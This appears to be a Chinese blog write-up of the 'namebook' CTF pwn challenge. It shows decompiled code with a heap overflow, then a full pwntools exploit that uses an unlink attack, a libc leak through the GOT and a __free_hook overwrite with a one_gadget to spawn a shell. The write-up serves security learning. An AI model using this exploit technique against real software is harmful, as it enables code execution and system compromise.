namebook

最新推荐文章于 2023-12-14 18:46:04 发布
最新推荐文章于 2023-12-14 18:46:04 发布
阅读量3.7k 收藏
点赞数
分类专栏: Pwn CTF
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/88257642
版权
Pwn 同时被 3 个专栏收录
28 篇文章 8 订阅
订阅专栏
CTF
22 篇文章 4 订阅
订阅专栏
6 篇文章 1 订阅
订阅专栏

检查机制:

sir@sir-PC:~/desktop$ checksec name
[*] '/home/sir/desktop/name'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

开启了RELRO,这里提一下:
在Linux系统安全领域数据可以写的存储区就会是攻击的目标,尤其是存储函数指针的区域. 所以在安全防护的角度来说尽量减少可写的存储区域对安全会有极大的好处;
GCC, GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术: read only relocation.大概实现就是由linker指定binary的一块经过dynamic linker处理过 relocation之后的区域为只读;
RELRO设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号,从而减少对GOT(Global Offset Table)攻击;
也就是这道题修改got表的方法可能就会失败;

漏洞发现

set name功能:

int sub_4009B8()
{
  int result; // eax@2
  int v1; // [sp+Ch] [bp-4h]@1

  printf("index:");
  v1 = sub_4008F0();
  if ( v1 <= 9 )
  {
    *(_QWORD *)&ptr[8 * v1] = malloc(0x80uLL);
    printf("name:");
    write_s(*(_QWORD *)&ptr[8 * v1], 0x80u);
    result = puts("done.");
  }
  else
  {
    result = puts("invalid range");
  }
  return result;
}

reset name功能:

int edit()
{
  int result; // eax@3
  int v1; // [sp+Ch] [bp-4h]@1

  printf("index:");
  v1 = sub_4008F0();
  if ( v1 <= 9 && *(_QWORD *)&ptr[8 * v1] )
  {
    printf("name:");
    write_s(*(_QWORD *)&ptr[8 * v1], 0x100u); //这里有溢出 0x100u > 0x80u
    result = puts("done.");
  }
  else
  {
    result = puts("invalid range");
  }
  return result;
}

这里添加name的时候申请的是0x80的chunk,但是编辑name的时候却可以写0x100个字符串进去;

bss:0000000000602029                 align 20h
.bss:0000000000602040 ; char ptr[80]
.bss:0000000000602040 ptr             dq ?                    ; DATA XREF: add+48w
.bss:0000000000602040                                         ; add+64r ...

这里将ptr放在了bss段;

思路

因为写入的字符串都加了‘\x00’,所以我们不能直接通过delete来泄露libc;但是我们可以通过unlink的操作来修改ptr的指针,然后来泄露libc,因为不可以修改got表了,所以通过修改将__free_hook地址的内容改为one_gadget的地址;
找one_gadget的偏移:

sir@sir-PC:~/desktop$ one_gadget ./libc.so.6
0x46428	execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4647c	execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xe9415	execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xea36d	execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

这里one_gadget有多个,不一定每个都可以运行成功,需要试一下;

EXP

from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './name'
p = process(name)
#p=remote('pwn2.jarvisoj.com', 9893)
elf= ELF(name)
libc = ELF('./bc.so.6')
if args.G:
    gdb.attach(p)
    
def add(i,s):
    p.recvuntil('>')
    p.sendline('1')
    p.recvuntil('index:')
    p.sendline(str(i))
    p.recvuntil('name')
    p.sendline(s)
    
def delete(i):
    p.recvuntil('>')
    p.sendline('2')
    p.recvuntil('index:')
    p.sendline(str(i))   
    
def show(i):
    p.recvuntil('>')
    p.sendline('3')
    p.recvuntil('index:')
    p.sendline(str(i))   
    
def edit(i,s):
    p.recvuntil('>')
    p.sendline('4')
    p.recvuntil('index:')
    p.sendline(str(i))   
    p.recvuntil('name')
    p.sendline(s) 
   
add(0,'a'*8)
add(1,'b'*8)
#unlink
fd = 0x602040 - 0x18
bk = 0x602040 - 0x10
pay = p64(0) + p64(0x80) + p64(fd) + p64(bk) + 'q'*(0x80 - 4*8) + p64(0x80) + p64(0x90)
edit(0,pay)
delete(1)
#leak 
pay1 = p64(0) + p64(0) + p64(0) + p64(elf.got['free']) + p64(0x602040)
edit(0,pay1)
show(0)
free_addr = u64(p.recv(6) + '\x00'*2) 
libc_addr = free_addr - 0x83120
one_gadget = libc_addr + 0xe9415
free_hook = libc_addr + 0x3c4a10
success("free_addr: " + hex(free_addr))
success("libc_addr: " + hex(libc_addr))
success("one_gadget: " + hex(one_gadget))
success("free_hook: " + hex(free_hook))
#cover
edit(1,p64(free_hook))
edit(0,p64(one_gadget))
#execve("/bin/sh", rsp+0x50, environ)
delete(0)    
p.interactive()

总结

__free_hook 和 one_gadget 还有 __malloc_hook 这些都是很有用的,而且在libc中,比较万能;

钞sir
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HDFS分布式存储中NameNode 和DataNode 有什么区别?
HDFSpt的博客
08-17 2135
HDFS分布式存储中NameNode 和DataNode 有什么区别? 随着互联网不断得突飞猛进,数据就逐渐演变为科技和经济发展的核心。更是对于互联网时代的人类和企业来说,是至关重要的,可能对于普通人来说没有太大影响,但是对于国家和大型企业来说,数据就是其命脉,人工智能就是对数据海量化的最好证明之一。 所以,数据存储的稳定在一定程度上就可以决定人类经济的高度。 但是,许多人还没有搞清楚个人电脑互联网是什么,移动互联网在这里,当我们还没搞清楚移动互联网的时候,大数据时代又来了," 马云在离任时说。大数据的应用
用python实现简易图书管理系统
xyx2023的博客
03-10 8330
本文主要介绍用python建立一个简单的图书管理系统,很多图书馆都有自己的图书管理系统,它主要担负的功能有借书和还书,以及图书管理员对图书的操作等。
mysql里使用bookname_Mysql的基本操作知识
weixin_36189159的博客
01-30 1036
顺带,我会在后面把我整理的一整套CSS3,PHP,MYSQL的开发的笔记打包放到百度云,有需要可以直接去百度云下载,这样以后你们开发就可以直接翻笔记不用百度搜那么麻烦了。Mysql数据库操作当数据表不能成功输出中文,出现乱码的时候,就输入:set names ‘gbk’;一、创建数据库create databaseCreatedata database db_user;二、查看数据库show da...
编写一个Book类,该类至少有name和price两个属性
Glee_one的博客
12-07 4883
编写一个Book类,该类至少有name和price两个属性。该类要实现Comparable接口,在接口的compareTo()方法中规定两个Book类实例的大小关系为二者的price属性的大小关系。在主函数中,选择合适的集合类型存放Book类的若干个对象,然后创建一个新的Book类的对象,并检查该对象与集合中的哪些对象相等  package app; import java.util.
定义一个Book(图书)类,在该类定义中包括: (1)数据成员:bookname(书名)、price(价格)和number(存书数量)。 (2)成员函数:display(显示图书的情况;borrow(
热门推荐
qq_43694257的博客
04-19 3万+
#include #include using namespace std; class Book { public: Book(string name,int p,int n);//构造函数 void borrow();//借书 void restore();//还书 void disp();//显示剩余产品数量 private: string bookname;//书名 int price;...
python爬虫学习笔记二(1):python的基本命令
m0_47431142的博客
06-15 176
参考书目 《python网络爬虫从入门到实践》唐松 2.1 python的选择 (1)anaconda自带的Jupyter Notebook编辑器 (2)anaconda自带的Spyder编辑器 打开方式:官网下载anaconda,打开cmd命令提示符输入编辑器的名称再点击换行即可 2.2 python的基本命令 (1)字符串(string) 字符串用来存储类似句子的类型,放在单引号(’)或双引号(")中,字符串可以用加号加起来 string1 = 'python web scraping' string2
namenode 和 datanode区别
liyabing1的博客
04-13 5633
一、namenode 接收用户操作请求 维护文件系统的目录结构 管理文件与block之间关系,block与datanode之间关系 namenode管理:namenode支持对HDFS中的目录、文件和块做类似文件系统的创建、修改、删除、列表文件和目录等基本操作。 块存储管理 在整个HDFS集群中有且只有唯一一个处于active状态namenode节点,该节点负责对这个命名空间(HDFS)进行管理...
C语言项目搭建-图书管理系统(链表详解)
最新发布
2301_79201049的博客
12-14 3341
图书管理系统
图书信息管理系统(C/C++课程报告)
soul_mingling的博客
09-30 1089
图书信息管理系统 2020年中国石油大学(华东)C/C++课程报告 本来这个课转专业之前就该修的,但是由于各种变数,拖到了现在……不过还好老师人很好,由于之前学过的缘故,交个结课大报告就可以算结课,遂做的功能很齐全,感谢老师给了个满分的机会。 代码界面截图: 运行前,要新建几个文件(以文件模拟数据库,没有文件相当于没有数据库,无法登录进行进一步操作) 其中user.txt里一定要有一项"admin 111111"(后面的密码可以不一致,这是预置的管理员账户) 下面是我的文件截图 user.txt
SROP
钞sir的博客
12-20 1万+
简介 SROP的全称是Sigreturn Oriented Programming,这是ROP攻击方法中的一种,其中sigreturn是一个系统调用,在类unix系统发生signal的时候会被间接地调用;在传统的ROP攻击中我们需要寻找大量的gadgets来对寄存器进行赋值已达到我们的需求,而SROP可以减少我们寻找gadgets的难度… 前置知识 signal 机制 我们都知道在Linux中,系...
ROP高级用法之ret2_dl_runtime_resolve
钞sir的博客
04-29 1万+
简介 程序想要调用其他动态链接库的函数,必须要在程序加载的时候动态链接;在一个程序运行过程中,可能很多函数在程序执行完时都不会用到,比如一些错误处理函数或者一些用户很少用到的功能模块;所以ELF采用一种叫做延迟绑定(Lazy Binding)的做法,基本思想就是当函数第一次被用到的时候才进行绑定(符号查找、重定位等); 而在linux 中是利用_dl_runtime_resolve(link_ma...
Linux kernel Exploit 内核漏洞学习(0)-环境安装
钞sir的博客
07-24 1万+
前言 在Linux上面搞事情很多东西都可能需要我们利用源码来自己编译,相对于Windows来讲可能会比较麻烦和耗时,这个过程中肯定会遇到很多报错,所以一定要有耐心… 方法步骤 编译内核 首先到linux内核的官网下载一份内核源代码并解压: 至于需要下载的版本,随意就好,我下载的是5.2.1的… 然后先安装有些依赖: sudo apt-get install git fakeroot build-...
Linux kernel Exploit 内核漏洞学习(1)-Double Fetch
钞sir的博客
07-25 1万+
简介 Double Fetch从漏洞原理上讲是属于条件竞争漏洞,是一种内核态与用户态之间的数据存在着访问竞争;而条件竞争漏洞我们都比较清楚,简单的来说就是多线程数据访问时,并且没有对数据做必要的安全同步措施;当多线程时,对于同一数据有一个线程在读而有另外一个线程在写,这就可能引起数据的访问异常,而此时如果这个异常访问情况发生在内核与用户线程之间时,就触发double fetch漏洞了… 为了简化漏......
ctf-pwn的一些小技巧
钞sir的博客
11-15 1万+
皑如山上雪 皎若云间月
一个简单的例子入门pwn
钞sir的博客
10-23 1万+
首先,pwn大概是pwn to own的意思,就是通过二进制/系统调用等方式获得目标主机的shell; 我直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令; 所需要的工具安装等,可以先看这个链接(https://blog.csdn.net/qq_40827990/article/details/83217716) 例子下载地址:https://d...
hctf2016-fheap
钞sir的博客
03-28 1万+
题目地址:https://github.com/zh-explorer/hctf2016-fheap 程序简介 程序中只有3个功能,一个create,一个delete然后一个quit: +++++++++++++++++++++++++++ So, let's crash the world +++++++++++++++++++++++++++ 1.create string 2.delete ...
kernel pwn -- UAF
钞sir的博客
07-25 1万+
简介 众所周知,UAF的全称是Use After Free,是一种释放后重用漏洞;之前一直是在用户态下对这个漏洞进行利用学习的,最近想要体验一下在内核环境中利用此漏洞进行提权操作… 用户态的常规UAF可以看这篇文章… 这里我利用的CISCN2017 babydriver来进行学习的,环境我已经放到github上面了,需要的可以自行下载… 前置知识 权限 在Linux当中每个进程都有它自己的权限,而...
2019西湖论剑Storm_note
钞sir的博客
04-13 1万+
分析 这道题的漏洞不多,在edit note的时候有一个off_by_null漏洞: 然后还有一个后门: 没有show功能,想要泄露地址有难度;而且程序禁用了fastbin的申请: ssize_t init_proc() { ssize_t result; // rax int fd; // [rsp+Ch] [rbp-4h] setbuf(stdin, 0LL); setb...
针对IO的利用
钞sir的博客
02-05 1万+
简介 正常情况下我们用户的输入长度和写入位置都在受到程序限制的,不可能让用户任意地址任意长度写入; 但是利用特定的漏洞,我们可以修改到IO结构体中的指针,就可以绕过上面的那些约束从而getshell… _IO_FILE 在结构体_IO_FILE当中有很多关键指针: 结合源码: int _IO_new_file_underflow (_IO_FILE *fp) { _IO_ssize_t co...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值